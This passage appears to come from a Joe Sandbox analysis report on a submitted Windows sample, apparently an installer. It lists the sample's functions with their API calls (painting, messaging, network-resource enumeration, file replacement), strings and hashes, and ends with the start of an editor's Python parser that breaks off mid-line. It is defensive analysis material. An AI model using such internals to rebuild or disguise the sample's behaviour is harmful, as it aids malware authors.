                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                      • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                      • API String ID: 3478007392-2498399450
                                                                                                      • Opcode ID: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                                      • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                                                                      • Opcode Fuzzy Hash: 9d5cf1aadbd407eeb031432e352e4554899be5068d45876e9cc0d059751b9763
                                                                                                      • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                                                                      APIs
                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                      • API String ID: 1782028327-3855017861
                                                                                                      • Opcode ID: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                                      • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                                                                      • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                                                      • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                                                                      APIs
                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                      • SaveDC.GDI32(?), ref: 00416C93
                                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                      • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808407030-0
                                                                                                      • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                      • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                      • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                      • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                      • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                      • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                      • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                      • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                      • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                      • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                      • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                                      • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                                                      • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                                      • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                                      • String ID:
                                                                                                      • API String ID: 2246927583-0
                                                                                                      • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                      • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                                      • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                                      • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                                      APIs
                                                                                                        • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                                                      Strings
                                                                                                      • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                                                      • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                                                      • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                      • API String ID: 1452528299-4018462623
                                                                                                      • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                                      • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                                                                      • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                                                      • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                      • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                      • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                                      • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                      APIs
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                                      • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                                      • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                                      • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A022A08830$A480
                                                                                                      • String ID:
                                                                                                      • API String ID: 3036329673-0
                                                                                                      • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                      • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                                      • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                                      • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                                      APIs
                                                                                                      • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                                      • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                                      • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Enum$NameOpenResourceUniversal
                                                                                                      • String ID: Z
                                                                                                      • API String ID: 3604996873-1505515367
                                                                                                      • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                      • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                                                      • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                                                      • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                                                      APIs
                                                                                                      • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                                                      • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DrawText$EmptyRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 182455014-2867612384
                                                                                                      • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                      • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                                                      • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                                                      • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                                                      • 73A0A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A480A570CreateFontIndirectObjectSelect
                                                                                                      • String ID: ...\
                                                                                                      • API String ID: 2998766281-983595016
                                                                                                      • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                      • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                                                      • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                                                      • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                      • String ID: .tmp$_iu
                                                                                                      • API String ID: 3498533004-10593223
                                                                                                      • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                                      • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                                                      • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                                                      • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                                      • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                                      • RegisterClassA.USER32(?), ref: 004164DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoRegisterUnregister
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3749476976-2766056989
                                                                                                      • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                                      • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                                                      • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                                                      • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                                                      • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Attributes$Move
                                                                                                      • String ID: isRS-%.3u.tmp
                                                                                                      • API String ID: 3839737484-3657609586
                                                                                                      • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                                      • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                                                      • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                                                      • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
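The per-function API listings in this report are machine-generated and tedious to read in bulk, but the call sequences carry the analyst-relevant signal: a function that calls WNetOpenEnumA and WNetEnumResourceA is walking network resources, one that clears attributes and then calls MoveFileExA with MOVEFILE_REPLACE_EXISTING is replacing a file in place, and an export shown as a bare address (73A08830.GDI32) is an import the sandbox could not resolve by name. The following Python is an added example written for this page by the editor; it is not Joe Sandbox output and not code from the analysed sample. It parses lines in exactly the format shown above into per-function records and applies a handful of triage heuristics. The SAMPLE text is copied from records on this page; the heuristic rules, their wording, and the record grouping on the `APIs` header are the editor's assumptions about what an analyst would want flagged, not the sandbox's own signature logic.

```python
"""Parse Joe Sandbox per-function API listings and triage the call sequences.
Added example for this report (editor's code, not Joe Sandbox output and not
code from the analysed sample). Triage rules are editor's heuristics."""
import re

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE(args), ref: address. Joe Sandbox prints an unresolved import
# as its 8-hex-digit address in place of the export name (e.g. 73A08830.GDI32).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
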